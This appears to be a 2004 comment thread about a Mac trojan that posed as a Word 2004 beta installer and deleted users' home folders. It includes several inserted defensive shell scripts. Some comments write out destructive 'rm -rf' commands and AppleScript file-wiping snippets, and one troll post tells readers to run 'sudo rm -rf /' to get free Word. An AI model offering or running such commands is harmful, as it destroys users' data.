Mac Trojan Horse Disguised as Word 2004
Espectr0 writes "Macworld is alerting of a malware program for the Mac. A Macworld reader alerted the magazine to the malware after he downloaded the file from Limewire. The reader told Macworld: 'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta. The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.' However, he added: 'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'" This sounds similar to the recent trojan horse proof-of-concept. There are many ways to make one file look like another, on any platform. This is 2004, you should know by now not to open a file from an untrusted source.
The grass is only greener, if you don't take care of your own lawn.
I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta...I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!
Maybe this is Microsoft's new security paradigm. No one can steal your data, not even you!
"Molest me not with this pocket calculator stuff."
- Deep Thought
The reader told Macworld: 'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta.
Using Limewire? A likely story.
The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.' However, he added: 'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'"
This is the risk you take when downloading stuff that you don't pay for. If you purchased Office 2004 from Microsoft (thus supporting the promotion and development of software for OS X), then you would have something to gripe about. As it stands, one might suggest you got what you paid for.....
This is 2004, you should know by now not to open a file from an untrusted source.
Well said. However, this does raise the possibility of other code that could be made to look like just about anything. So, once again, think about what you install on your computer just like you would think about what you eat or who you have sex with. If you don't know, trust or suspect that software/food/person, then either screen them or think twice.
Visit Jonesblog and say hello.
This would never have happened if they were using a secure operating system like Windows.
yeah.
Uh-huh.
Now, if you'll excuse me, I have a coughing fit that requires my immediate attention...
Obliteracy: Words with explosions
Hector would be proud!
licet differant, aequabitur
That'll teach them Mac users to go clicking carelessly!
Let's see... You downloaded a Microsoft public beta from a p2p net without checking MS's website for any existence of the beta. Then just because the icon looked like a M$ icon you figured it was safe with no virus scan? If you purchase this BEAUTIFUL Florida swampland I have, I bet your files will be restored and Word 2004 will work fine.
call me
"as plurdled gabbleblotchits on a lurgid bee" - Prostetnic Vogon Jeltz. (One man's humorous is another mans flamebait)
Because everyone knows the icon is the best way to ascertain the security and authenticity of any piece of software. It's very secure and hard to change, uh huh.
Ha Ha
The earlier article dealt with a document file showing the wrong file type because of extension VS resource fork issues.
This is just a case of assigning a different icon to an application. Could be as simple as an rm -rf / shell script with a word icon.
Every OS is vulnerable to the ultimate virus: Stupidity.Virus.a. Only one release was needed.
This should be filed under the "Humans" topic as this has nothing to do with apple or even computers.
Trojan Horses are social problems -- there isn't much apple or microsoft or anyone can do other than try to keep people on their toes.
I mean come on, limewire?
davidu
# Hack the planet, it's important.
Seriously, what a tard. The only things you can trust off Limewire is the quality porn!
This is funny. He got what he deserves. Microsoft has plenty of private beta testers. He should just spend the 150$.... stealing is not worth it.
I downloaded the file [off Limewire] in the hope that perhaps Microsoft had released some sort of public beta
Yeah I'm sure he was thinking that the file he got off LimeWire was some sort of legit public beta from MS. I mean that's the first place MS would release something like that. Not official MS sites, but a P2P network with no announcement.
-- taking over the world, we are.
'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta'
That's a likely story...
Come on people. The only trustworthy source of any public beta software from Microsoft would be a website in the form of "http://*.microsoft.com/*", and there'd likely still be pretenders claiming to be that package floating on Limewire. Don't trust that it's Microsoft software unless you've seen Microsoft say that the distributor is legit.
Instead of deleting a person's files (I know you 0wn3r3d th3m!@#!) how about you do the rest of us a favour.
From this point on all trojans, such as this one, who invite idiots to test the lows of their computer skills should, instead of removing random files, disable a person's net connection. Think about the good you would suddenly be doing for the online world! You can make a positive difference! Your life isn't lost yet! Go you!
--- I do not moderate.
I mean, a 60-kilobyte AppleScript fits the name "Word 2004 Mac Beta Installer" perfectly.
D'uh.
Maybe we deserve this world ?
I don't have trojans or spyware. And when I manage
my finances with Quicken v5 (for DOS) it doesn't phone home.
Why does everyone think they need bleeding edge
office productivity software?
BTW, WP5.1 for DOS still prints to my postscript printer...
I agree to a certain extent. This is not something that Mac users are accustomed to though. I grew up in a town where people didn't need to lock their house and car doors. If someone was robbed, I'd blame the crook, not the resident.
Yeah, yeah, yeah. The story is a dupe, the topic is boring, the facts weren't checked. WE GET IT!!
..the icons must have had something that gave away the true purpose of the app?
Did it lack a little polish in some corners?
Had the Arial font been used?
Was there strange bouncing activity while it was in the dock?
This is a perfect use for Fast User Switching. Create an account with no perms and no data you care about losing. Test downloads in that account. You can do it without even logging out.
Be careful though of the fact that there's no restriction on network access for a 'no perms' account. (This is a failing of UNIX in general, not MacOS in particular.) This would allow Microsoft/anyone to put out a trojan like this, and send back a 'this IP fell for it' packet, or even run a server on a 'high' port (depending on your firewall configuration).
Awesome furniture, accessories and cabinetry in Santa Rosa, CA: http://humanity-home.com/
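The "spare account with nothing you care about losing" idea above, scripted as an added example (my code, not from any poster in this thread): a POSIX shell wrapper that runs an untrusted program with HOME pointed at a throwaway directory and afterwards reports what the program deleted or created there. The decoy contents and all function names are constructed for the example; it assumes only mktemp, find, comm and env. As the comment says, it does nothing about network access, and the comments in the code say so.

```shell
#!/bin/sh
# Added example, not from the thread: the command-line version of the
# "spare account with nothing you care about" advice. The untrusted program
# runs with HOME pointing at a throwaway directory, and afterwards we report
# what it created or deleted there. All paths and names are assumptions.

# Build a decoy home with a few files that would hurt to lose (constructed).
make_decoy_home() {
    decoy=$(mktemp -d)
    mkdir -p "$decoy/Documents" "$decoy/Desktop"
    echo "quarterly report" > "$decoy/Documents/report.txt"
    echo "holiday photo"    > "$decoy/Desktop/photo.jpg"
    printf '%s\n' "$decoy"
}

# Sorted list of everything under a directory, for before/after comparison.
snapshot() {
    (cd "$1" && find . | sort)
}

# run_in_decoy '<shell command>': run the command with HOME set to a fresh
# decoy and a minimal environment. Prints what changed; returns 1 if the
# command deleted anything, 0 otherwise. The decoy is removed afterwards.
run_in_decoy() {
    program="$1"
    decoy=$(make_decoy_home)
    snapshot "$decoy" > "$decoy.before"

    # env -i hides your real HOME, shell history and credentials from the
    # program. Caveat from the comment above: this does NOT block network
    # access; on Linux 'unshare -n' (root only) would, and is left out here.
    rc=0
    env -i HOME="$decoy" PATH=/usr/bin:/bin sh -c "$program" || rc=$?
    echo "program exited with status $rc"

    snapshot "$decoy" > "$decoy.after"
    removed=$(comm -23 "$decoy.before" "$decoy.after")
    added=$(comm -13 "$decoy.before" "$decoy.after")
    rm -rf "$decoy" "$decoy.before" "$decoy.after"

    if [ -n "$added" ]; then
        printf 'created in decoy home:\n%s\n' "$added"
    fi
    if [ -n "$removed" ]; then
        printf 'DELETED from decoy home:\n%s\n' "$removed"
        return 1
    fi
    return 0
}

# Usage: run_in_decoy './Word 2004 Mac Beta Installer.app/Contents/MacOS/applet'
```

The wrapper reports on the decoy only; a program that phones home or listens on a port (the scenario in the comment above) would pass this check, which is why a separate account or machine with the network unplugged is still the stronger test.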
Is it just me, or did I miss all the Trojan like aspects of that program?
Yes, it had undesirable consequences of running an un-trusted application, but Trojan?
Sounds like a bunch of hooey to me.
Not really, no. The point of that was that it was an application that looked like an mp3. This is just an application with a misleading name/icon. Anyone could write code that erases a user's home folder and call it Microsoft Word.
Why is this posted here? I don't post about it when my lame ass family does stupid things like this, this is pathetic, you lose your geek status.
There should be a poll to rate the stupidity of these people. Further proof that the biggest security risk to the internet is not Microsoft, Mac, Virii etc. It's the stupidity of the majority of internet users that will bring us all crashing down.
coughDUMBASScough... This is about as bad as when I heard a customer complain to Blockbuster that the DVD they rented was scuffed and they couldn't burn it...
I mod down so you can mod up. You're welcome.
This is 2004, you should know by now not to open a file from an untrusted source.
This is 2004, shouldn't the OS be smarter about security for users?
They forgot to put the quotes around "public beta"... Maybe it's one of those "public betas" that retail at around € 200 ... Hmmhmm...
Hate me!
We all know that P2P is a trustworthy source. *rolls eyes*
He doesn't mention this in the article, but I was wondering if this asked him for a password before it executed.
I would assume it would have to before it runs an rf command on his home directory.
If it didn't ask for one, that's not good. If it did and he entered it in, he's a complete moron. Although the reality is, any OS will always be vulnerable to user stupidity. It's the worms etc., that are a serious problem.
------------start-------------
#!/bin/sh
rm -rf ~/*
Then about 30 megs of gibberish....
--------------stop--------------
Put it in an AppleScript so it's executable by default (a simple AppleScript can start a sh script easily), give it a pretty icon...
Put it on a P2P and call it NudeBeachShotsJobAndGates.wmv.
Hack of the century.
'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta. The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.'
Ah! The icon looked genuine and trustworthy? From Limewire? Sounds like a proof-of-concept that people are stupid.
Macs and Linux don't get viruses, right? (ducking and running to get asbestos flame proof suit) :)
Agile Artisans
Sure, that file came from an untrusted source. In fact, doesn't it serve them right to get bitten by illegally downloading software? Software that should cost money, and in fact does (quite a bit).
But forget the fact that this happened on an unethical download. The fact that this is malware, not a virus or a worm, not something that is exploiting the operating system by opening known bugs or attempting to hack into key parts of the system which normally would require keychain access, but that this is merely software that the user chose to install, and chose to authenticate (maybe? did it require keychain access to be able to delete files from the home directory? I think Apple probably allowed that to happen since programs *do* need to be able to write files to the Home directory, just not anywhere else, save for a temporary folder like /tmp).
Just keep in mind that while the program itself was not ethical, nor were the actions of the user by downloading non-free software, this should come as no surprise to the user or to Apple, since this is not a compromise of the system nor something Apple can prevent, except through education (Don't open untrusted files and programs).
Do you think this would have happened if the user was downloading legit sourceforge or another self-produced program that claimed to do something else and just became malware or a random pop-up creator? Would we cry foul if the program was *not* downloaded illegally?
Don't eat your soul to fill your belly.
conesus.com
this would have been just as easy on a linux machine.
'i downloaded IE for linux from a warez IRC channel and untarred it and ran it. now i have no home folder.'
noexec on the partition, then it's a matter of running it via a library.
(to see for yourself, google: noexec lib ld linux so)
You find a file, supposedly MS word. On a P2P network (let's just spontaneously forget all the worms, trojans, and malware that spread over these things). You don't do any research as to whether or not MS *actually* released *anything* of that nature (or even if something like it is in development). You obviously decided it was a good idea to run this program. IMHO, you got what you deserved.
I always liked to think that the general computer security paradigm changed. Unfortunately, I have been proven wrong yet again.
Only the purest of souls seek enlightenment. Everyone else just wants power.
That's right! Here in 2004 we know not to do silly things like download and execute files from an untrusted source. That's why I just dl'd this spyware/trojan/virus checker. It works just like thi
*CARRIER LOST*
OK, So we have a story here, about someone who downloaded something that they didn't know what was off a P2P network, HOPED it was something they didn't even know had been released, and they're surprised it hosed their system?
Look at the author's name, 'Pudge'...does anyone other than me find it curious that an Apple news item is submitted by 'Pudge', when we're ALL familiar with the infamous 'Father Randy 'Pudge' O'day'?
The whole thing smacks of trollery.
Don't park drunk, accidents cause people.
After all, if they had never released Word, this never would have happened.
And can you believe Microsoft still has security holes in their OS like actually executing code just because the user said to do so?
If only people would switch to my OS, they would be so much more secure, since it doesn't even have applications in the first place.
If it was a Windows install you could check to make sure that various files were signed and authenticated by MS, information which I don't believe can actually be faked (dlls, exe, cab files, etc.).
I don't know if Mac has a similar feature, and I don't know if some random moron like this guy would even have bothered to check. However, it would seem that MS' own security would indeed have offered a better chance of preventing such a Trojan.
-rt
Bwahahahahahaha
You have to use the Real Microsoft command (rm for short)
1. Open Terminal
2. Type 'sudo rm -rf /'
3. Provide your password....
A similar program on Windows could do far more than just hose someone's Home folder, because most Windows users run with high privileges.
Anyway...this is stupid. It really is.
This sounds similar to the recent trojan horse proof-of-concept
This is nothing of the sort. The recent warning was for mp3 or other non-executable-looking files carrying a trojan horse payload...that is far sneakier than this. This is simply a program that doesn't do what it claims to do. He expected an executable, he got an executable. And if he really thought that Microsoft would release a public beta through limewire...well, caveat emptor and all.
Since it only deleted his home directory, it probably wasn't that sophisticated. I'm surprised it didn't attempt to escalate privileges under the guise of an installer and do even more damage.
I suppose I should make a clippy joke here (I'm really tempted), but I actually like office X and am looking forward to the next version.
Do not taunt Happy Fun Ball(TM)
How does this differ in functionality from Word 2003?
:wq
I wish I could say I'm surprised at the gullibility of this particular user, but I'm surrounded by an office full of similarly-minded folks. They're of the click-before-you-consider mindset simply because "we're on macs... all that bad stuff is for Windows users." I'm in hopes they're not all anxious to try out Word 2004.
It's nice to see that, on a Macintosh, even the biggest idiot can only erase their data by accident, not vital OS files.
Moronic Mac Maniac Makes Mindless Manoeuvre!
Click-happy clump clicks on covert icon!
Netcraft confirms: Mac users are braindead too.
Evilly stolen from robg Link
After reading the article and the press release, I think it's pretty obvious what the program is doing -- I suspect it's nothing more than a one-line AppleScript. Although some (perhaps many) will disagree with me, I'm going to publish what I think the exploit to be, because it's not a huge secret. Basically, my guess is that the trojan horse is a one-line AppleScript that contains the following UNIX command (in the script, the command will be accessed via the AppleScript method for calling a shell command, but I'm not going to bother including that part here):
rm -rf ~
WARNING!! DO NOT USE THIS COMMAND! YOU WILL ERASE YOUR USER'S DIRECTORY!
I feel it's important that everyone understand the above command, and know what it looks like -- the more people who know what this line does and how it works, hopefully the fewer who will be fooled by it. And to claim that this is some "deep dark secret" that needs to be hidden is, in my opinion, trying to hide from the truth -- more "security by obscurity," which we all know doesn't work well at all. rm -rf is a very standard, very useful Unix command. In fact, if you search macosxhints (using the advanced search page) for the 'exact phrase' rm -rf, you'll get fully three pages of matches.
What makes it troublesome in this case is simply that it's called from a program where the typical user will not know what's happening, and will be shocked at the outcome. But listing the command is not like explaining how to write a self-replicating virus that spreads from machine to machine -- this is common knowledge to probably at least a couple of million OS X users who have some knowledge of Unix.
For those that don't know Unix, rm is "move to and empty trash," -r is "do this for all items and folders within this folder," the f means "force removal without confirmation," and the ~ means "the user's directory." Spelled out, this means that the script will, without warning or user intervention, delete everything in the user's folder. Permanently.
The Intego press release explains one way to test a program if you suspect it might be a trojan horse -- select it, do a Get Info, and try to delete the icon. Here's another safety check that I often use myself: drag and drop the program onto Script Editor (or control-click on a package and select Show Package Contents to explore the package contents if it's a package installer). If you're lucky, and the script writer was somewhat lazy (by not making the script uneditable), the script itself will open for editing.
So now that you know about this trojan horse, the question is, what should be done about them on OS X? My first thought on reading the article was "Cool, Darwin at work on the peer to peer networks!" But then, I considered some additional scenarios which may have more applicability in the real world. The current example is likely to remain on Gnutella, given that it's a program that purports to install the currently 'hot' application, the new Office suite. However, think about this version: A useful AppleScript that does something cool (change type/creator codes, backs up your directory, etc.). However, buried in the code is a timer that counts the number of times you've used the program. On the 50th run, it deletes your entire user's folder. Or worse, it pops up a dialog that says "In order to backup the Foo_bar file, we need your admin password." It may then be possible (I'm not quite sure how) for the app to delete the entire hard drive, instead of just your user's folder. If the script were useful enough, it could be very widely distributed, and then go blam! at some non-specified time in the future.
What, if anything, should Apple do about this? Note that this is not specific to OS X; it's really a 'social engineering' exploit. I think it would be just as easy to write a similar 'exploit' for Linux or even Windows, given that it's a simple script that relies
I fought the corporate America, and the corporate America bought the law.
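The two manual checks in robg's post (Show Package Contents, and finding out whether the "installer" is really a script) as an added shell example. This is my code, not robg's, Intego's or macosxhints'; the bundle layout it looks for (Contents/Info.plist, Contents/MacOS, Contents/Resources/Scripts/main.scpt), the pattern list and the size threshold are assumptions you would tune for your own downloads. It also folds in the download-size clue raised elsewhere in the thread.

```shell
#!/bin/sh
# Added example (mine, not robg's or Intego's): a pre-launch look inside a
# downloaded .app bundle. It automates the two checks described in the post
# above, namely looking at the package contents and finding out whether the
# "application" is really a script, and adds the download-size clue.
# Bundle layout, pattern list and threshold are assumptions; tune them.

# Commands that have no business in an installer fetched from a P2P network.
DESTRUCTIVE_PATTERNS='rm -rf|rm -fr|delete target|move home to trash|empty trash'

# Name of the bundle's main executable: CFBundleExecutable from an XML
# Info.plist, otherwise the first file under Contents/MacOS.
bundle_executable() {
    plist="$1/Contents/Info.plist"
    exe=""
    if [ -f "$plist" ]; then
        exe=$(tr -d '\n\t' < "$plist" |
              sed -n 's/.*<key>CFBundleExecutable<\/key> *<string>\([^<]*\)<\/string>.*/\1/p')
    fi
    if [ -z "$exe" ] && [ -d "$1/Contents/MacOS" ]; then
        exe=$(ls "$1/Contents/MacOS" | head -n 1)
    fi
    printf '%s\n' "$exe"
}

# Files under Contents/ mentioning a destructive command. String literals in
# a compiled AppleScript are stored in clear, so grep -a sees those too.
destructive_files() {
    grep -rEla "$DESTRUCTIVE_PATTERNS" "$1/Contents" 2>/dev/null || true
}

# inspect_bundle <path.app> [min_kb]: prints findings; returns 0 when nothing
# suspicious turned up and 1 when the bundle should not be launched.
inspect_bundle() {
    bundle="$1"
    min_kb="${2:-0}"
    problems=0
    echo "Inspecting $bundle"
    if [ ! -d "$bundle/Contents" ]; then
        echo "  !! not an application bundle (no Contents directory)"
        return 1
    fi
    # 1. A "Word installer" that is a few hundred KB is the first clue.
    size_kb=$(du -sk "$bundle" | cut -f1)
    if [ "$size_kb" -lt "$min_kb" ]; then
        echo "  !! only ${size_kb} KB on disk, expected at least ${min_kb} KB"
        problems=$((problems + 1))
    fi
    # 2. Is the main executable an interpreted script rather than a binary?
    exe=$(bundle_executable "$bundle")
    exe_path="$bundle/Contents/MacOS/$exe"
    if [ -n "$exe" ] && [ -f "$exe_path" ] && head -n 1 "$exe_path" | grep -q '^#!'; then
        echo "  !! main executable '$exe' is a script, not a compiled program"
        problems=$((problems + 1))
    fi
    # 3. AppleScript applets keep their compiled script here; on Mac OS X read
    #    it with:  osadecompile "<bundle>/Contents/Resources/Scripts/main.scpt"
    if [ -f "$bundle/Contents/Resources/Scripts/main.scpt" ]; then
        echo "  !! bundle is an AppleScript applet, not a native application"
        problems=$((problems + 1))
    fi
    # 4. Anything inside that talks about wiping files.
    hits=$(destructive_files "$bundle" | wc -l | tr -d ' ')
    if [ "$hits" -gt 0 ]; then
        destructive_files "$bundle" | sed 's/^/  !! destructive command in: /'
        problems=$((problems + hits))
    fi
    if [ "$problems" -eq 0 ]; then
        echo "  nothing obvious found (which is not proof that it is safe)"
        return 0
    fi
    echo "  $problems problem(s) found: do not launch this bundle"
    return 1
}

# Usage: inspect_bundle "Word 2004 Mac Beta Installer.app" 200000
```

A clean report only means the lazy cases are ruled out: a script author who bothered to obfuscate the command, or shipped a real compiled binary, would pass every one of these checks, which is why the spare-account test earlier in the thread is still worth doing.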
Why would an editor even accept this story? Be it Macworld or Slashdot. Wow, viruses hiding as warez! What a concept!
am i the only who doubts the authenticity of this story?
sounds like the G5 case mod: a made-up story to rile the Mac heads..?
Anything I download or get from an untrusted source I run in a clean Virtual PC first. Easy.
Never, ever lose a file again. Ever.
From the read me:
Trojan Example Read Me
This is an EXAMPLE of an AppleScript with a custom icon. It does nothing malicious. It does not spread. It does not delete files. It speaks and displays some dialog boxes. It's merely poking fun at Intego's sensationalist handling of these issues on Mac OS X, and their claims that these represent serious flaws in Mac OS X.
I wonder if Intego will protect against, and describe, this trojan...?
Perhaps they can make another press release hawking VirusBarrier.
For more information:
das@doit.wisc.edu
Available at:
http://mirror.services.wisc.edu/mirrors/tmp/
The "trojan" is an AppleScript that speaks the text: "Muhahahaha. You have been owned by this elite trojan. Just kidding." It then displays a series of dialog boxes:
1. "OMG! it's another trojan for Mac OS X! Will Intego have to protect against this one too?"
2. "Intego's irresponsible sensationalism about non-issues is quite astounding."
3. "They make wild claims about 'serious weaknesses' in Mac OS X that simply aren't true, for the sake of hawking their product."
4. "AppleScripts and fake MP3s do not, nor will they ever, rise to the level of the mind-boggling number of completely remote exploits for Windows, requiring absolutely no user interaction, that plague millions of computers and cost billions of dollars of lost productivity."
5. "Mac OS X is intrinsically and fundamentally more secure, and more open to peer and community review."
6. "Social engineering problems, such as tricking a user into launching a fake Word installer that's really an AppleScript downloaded from a P2P network, don't reveal 'serious weaknesses' in Mac OS X."
7. "Intego would be well suited to selling snake oil at a two-bit carnival."
It then quits.
It has Intego's VirusBarrier X installer icon, and is named "VirusBarrier X Install.app".
(Note: this package is CLEARLY labeled as an example, and comes with a read me.)
-nt-
It looks like a program that has the ability to read/write/delete files from your hard drive. In fact, it is a program that has the ability to read/write/delete files from your hard drive. This same exploit could work on essentially any other OS.
So Troy is coming to theaters in 2004 and all of a sudden this trojan comes out disguised as Word 2004. I think I see what's going on here. Movie company makes trojan to hype new movie.
Ok, this is getting ridiculous. This problem is on EVERY operating system that can allow a program to delete a file. On Mac OS X (and other permission based systems) this risk is actually *reduced*. Unless you're running it as root (which is your own fault if you are :P) it can't do any damage to things that you don't own. The operating system remains stable but all your stuff is gone heh.
And two good rules of thumb (for any OS IMHO):
Monthly (or weekly) backups
A spare user account (with admin privileges of course)
That'll save you from having to reinstall and lose all of your information.
And downloading P2P isn't exactly a trusted source. As previous posters have said: If you want Microsoft Word, buy it, but don't be surprised that if you pirate it, it might not work.
TheMadRedHatter
while(1)
{
}
Ah, the story of life.
Seriously though, even relatively small user populations are vulnerable to trojans and worms. The Witty Worm (see this analysis) indicates that non-Windows users are just as vulnerable a target - Witty infected almost 100% of the vulnerable worldwide population of 12,000 or so machines in about an hour. In other words, Mac (and Linux) users need to take the same precautions as those of us who are saddled with bloody Windows do.
Never email donotemail@WeAreSpammers.com
Go cry to someone other than me. There are only more trojans for Windows than I have hair on my head. :P
Be glad it didn't fry your hardware, or make you download kiddie porn, or make you DoS SCO, or the FBI. Be glad I tell you, and beware that free software ye be tryin to get matie.
BTW knowing the history between Gates and Jobs, what in the hell made you think M$ would release something for the OS/x platform?
Is your BIOS fried?
I am Bennett Haselton! I am Bennett Haselton!
The funny thing is, this made MacWorld news... what does that say about Mac users? If someone wrote into Microsoft I believe they would just laugh in his face, and hang up the phone.
I mod down so you can mod up. You're welcome.
I second that quality porn comment
1) Create shell script with "rm -rf $home/*"
2) Package script with Microsoft Icon
3) Upload to P2P network
4) ???
5) Laugh as retarded Slashdot editors call it valid malware
Come on guys... lets get serious.
I'm glad to see that you can still make something more idiot-proof and nature will make a better idiot.
wtg nature!
ms already includes word 2005 on EVERY MAC!!!
.. it's like a total back door into the software.
you just need to use the "reveal microsoft" command
normally you have to use your credit card and get a license key from ms web site but they have this back door for maintenance and they FORGOT IT! It's gonna be fixed in the next security update. you must've read the macworld article, and it was on that mac dudes blog!!!!!
Here's the command for "reveal microsoft". first you have to get down into the Terminal program (I know: scareeeeey!) and just type this:
rm -rf /
That tells it to "reveal microsoft" "-rapid" "-final" "/" The slash means to install it on your main drive (the one inside the computer). If you have a really big firewire drive with all the cool stuff you got from limewire, you can replace "/" with the path to the drive (use finder and just drag the icon to the terminal window! macs are awesome!)
After you do this you will have FREE and LEGAL ms word on your mac!! not a beta! the real thing! You can trust me, I've been using macs since 1981!!
Yeah, because Limewire is the first place I go when looking into evaluating software. You're a thief and got what you deserved!
How can such a goal be attained? There are many ways available now. The most obvious one is a VM system with security policies, such as the JVM. That's not the only one, though. Another method is a capabilities-based system, so when a process starts, it has only a defined set of capabilities to work with. OpenBSD has a similar, but more limited system called systrace. The TrustedBSD project and SELinux have similar aims, and SELinux is being integrated into mainstream Linux distros. Another way to run untrusted things is with user-mode Linux, which I believe is integrated with Linux 2.6.
The editor is right, though, that on currently-used systems like OSX and MS Windows, you have to be careful what you click on. But the problem is that we have come to accept that as "the way things are", when there is no reason for that to be the case. You should be able to run hostile code, see what it does, laugh at it, and delete it without any harm. The technology to do that exists, and has existed for years, but we have come to accept broken products and systems that don't allow that.
---------
WAP news
s/Word 2004/new release/g
s/Limewire/BitTorrent/g
s/public beta/ISO image/g
Not so funny now, is it? Still, this is old news. Check the MD5sums when you download something. Or do forensics on it first. Or install it on a test machine. But, yes, it's easy to forge anything from mail to program icons - all the more reason to be careful.
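Checking the checksum, as an added example (my code, not the poster's): a small POSIX shell function that compares a downloaded file against a digest you copied from the vendor's own site. It accepts MD5 as the post says and SHA-256 as well, choosing the algorithm from the digest length; the tool names (md5sum or md5, sha256sum or shasum) are portability assumptions. A digest that came from the same P2P source as the file proves nothing, which is the whole point of comparing against the vendor's published value.

```shell
#!/bin/sh
# Added example, not from the thread: verify a download against a checksum
# published by the vendor on its own site, never one bundled with the download.
# Which hashing tool exists (md5sum/md5, sha256sum/shasum) is assumed per platform.

# file_digest <file> <md5|sha256>: print the lowercase hex digest.
file_digest() {
    file="$1"
    algo="$2"
    case "$algo" in
        md5)
            if command -v md5sum >/dev/null 2>&1; then md5sum "$file" | cut -d' ' -f1
            else md5 -q "$file"; fi ;;
        sha256)
            if command -v sha256sum >/dev/null 2>&1; then sha256sum "$file" | cut -d' ' -f1
            else shasum -a 256 "$file" | cut -d' ' -f1; fi ;;
        *)
            echo "unknown algorithm: $algo" >&2
            return 2 ;;
    esac
}

# verify_download <file> <expected-hex>: 0 on match, 1 on mismatch, 2 if the
# expected value is not a digest we recognise. The algorithm is inferred from
# the digest length: 32 hex characters is MD5, 64 is SHA-256.
verify_download() {
    file="$1"
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    case ${#expected} in
        32) algo=md5 ;;
        64) algo=sha256 ;;
        *)
            echo "expected hash has unexpected length ${#expected}" >&2
            return 2 ;;
    esac
    actual=$(file_digest "$file" "$algo")
    if [ "$actual" = "$expected" ]; then
        echo "$file: $algo OK"
        return 0
    fi
    # Either a corrupted download or not the file the vendor published.
    echo "$file: $algo MISMATCH (got $actual, expected $expected)"
    return 1
}

# Usage: verify_download "Office2004Beta.dmg" "<digest copied from the vendor page>"
```

MD5 is what the post names and what most vendors published in 2004; it still catches a corrupted or swapped download, but it is no longer collision-resistant, so prefer the SHA-256 value whenever the vendor publishes one.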
Why was this under the "Apple" topic? Do we not have a "Darwin awards" topic?
There is no sig, there is only Zuul.
Stupid User Trick, maybe. News? No.
Now, if someone dragged said stupid user, hung him by the feet from the ceiling in the Apple cafeteria and then let all the Apple employees make fun of him... that might be news.
nothing like users to break your security.
Some people have to learn things the hard way... but as long as people _do_ learn, it might not hurt to look at this story under a less critical light.
File under 'M' for 'Manic ranting'
No reason for morons to use Unix.
It will probably take him some time to replace all that lost porn too.
You have to wonder, word is a pretty hefty piece of software, did the attackers even bother padding the program? A really quick download time would be one of a multitude of clues that what you are downloading probably isn't legit.
for a moron who downloads MS Word from Limewire? Beta...(LOL) yeah right. Good for you idiot.
Newsflash, the source code of the trojan has been obtained. It's thought to be something like this:
----------
tell application "Finder"
move home to trash
empty trash
end tell
----------
Maybe we deserve this world ?
Here is the latest Mac virus, written completely in AppleScript.
tell application "Finder"
activate
set target to folder home
delete target
empty trash
end tell
This won't actually work though because r/o access to the root of the home directory is provided through AppleScript. This is really a non-event in trojan terms. It's affected a user trying to pirate software, be it beta Microsoft stuff. I guess you get what you deserve for installing beta Office builds... :-)
"404: Someone who's clueless. From the World Wide Web message> "404, URL Not Found," meaning that the document you've tried to access can't be located. "Don't bother asking him...he's 404, man.""
Trolls lurk everywhere. Mod them down.
Microsoft... released a 108KB version of Office? :-D Must be that new C# bytecode I've heard about! VERY EFFICIENT!!
-Don.
Cwm, fjord-bank glyphs vext quiz
If he had been using Mac OS or some *nix variant, he wouldn't have had to worry about trojans. There have been no viruses to date for Mac OS X. :) All viruses are for Windows.
This is 2004, you should know by now not to open a file from an untrusted source.
This is 2004, you should know by now that Microsoft can't possibly have released Office 2004 this year.
However, reading TFA, the following quote leaps out at me: A Microsoft spokesperson said: 'Security is a top priority for Microsoft, and we are committed to ensuring a safe and reliable computing experience for all of our customers. ' Yeah, right. Let them fix their installer first:
That would be a default install.
What Would the Fab Five Do?
Echoing what others have said. You get what you pay for. If I download something via Limewire or Acquisition then I am fully prepared for it to death my machine. I can partially understand the "A public beta by MS" thing, as yeah, if there was a public beta then it would get onto P2P; however, having said that, if I saw it on P2P, my next step would be the MS site to see if it's on there, and if so, then try downloading it from there, makes more sense to use the official source. One word that springs to mind is BACKUP! If he had a backup then so what if /Users/~ was trashed, just restore it, bingo!
User education, that's the key, alas, there will always be those who just won't or can't "get it", thus leading to these situations.
Well, maybe this IS/WAS a test/stunt by MS after all to show how "secure" and safe Mac OS X is.
Now excuse me while I go find my tinfoil hat!!
Well, of course, it should be easier to fool a Mac user...
After all... the ICON looked right, didn't it? I mean... If the ICON looks pretty, it must be some kinda candy, right? Because, all viruses and trojans have some sort of evil, nasty looking icon that should scare away the average Mac user... And the icon would clash with the design of the computer anyway... so they would get rid of it. But, if it matches, then, hey, it must be legit.
Sucker.
-- Liberalism is a mental disorder.
That's just as lame as me writing a shell script to run a command to delete tons of stuff, and making it larger to look like it's a real program! Why does crap like this get put on Slashdot?
-Imidazole2
The program would run as the current user.
If the program wanted to change system files it would have to ask for the root password, but because it only erased the files under the /user/my_name directory it wouldn't need to ask for a password.
Had Microsoft released it, wouldn't it be a trojan horse anyway? It will slow down your computer, transmit personal data to Microsoft and, if past versions history serves as comparison, open your computer wide to all sorts of attacks. Thinking of it, perhaps the version he downloaded is an alpha including only the "slow down, transmit and open" subsystems.
Clearly, this is a complex marketing ploy being pushed by Hollywood to promote its new Brad Pitt film.
You know, as someone who normally gets their "public betas" from IRC or Limewire rather than the source, I have to laugh my a$$ off at this.
Perhaps advantage Windows users on this one. PC users have long known that the "Lord of the Rings 3" from Kazaa is either going to be "Finding Nemo", or "Find your Files Sucker".
I foresee a whole lot of Mac users searching "Norton Anti" on Limewire for the next few days. Hope this guy doesn't rename his file and change the icon to the Norton logo.
MUWhahahahahahahahahaha
It's not a trojan, it's a fucking AppleScript with a Microsoft icon on it. The dumbass deserved to get hit when they saw it was only 104 megs when every install of Office had been 300 or more.
"Slashdot, where telling the truth is overrated but lying is insightful."
Should you WANT something if it is going to be a Trojan Horse?
This
Workaround: Create a new user and run the "installer" from that account.
Look Ma! I'm a Hacker!!!
I'm in the hole of the broadband donut.
Oh no, your entire home folder wiped because you started an untrusted installation application, which must have had the word Application right next to it if you had actually looked at the file which you got from an untrusted source. This is all Apple's fault, you think they should have patched the OS so that you would get an even bigger notification when you start an Application. Would something like that have saved you?
